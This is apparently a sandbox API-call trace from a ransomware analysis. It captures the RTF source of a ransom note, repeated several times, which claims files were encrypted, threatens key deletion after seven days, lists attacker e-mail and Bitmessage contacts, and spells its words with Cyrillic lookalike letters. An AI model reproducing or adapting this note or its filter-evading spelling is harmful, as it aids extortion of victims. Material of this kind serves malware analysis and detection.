YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 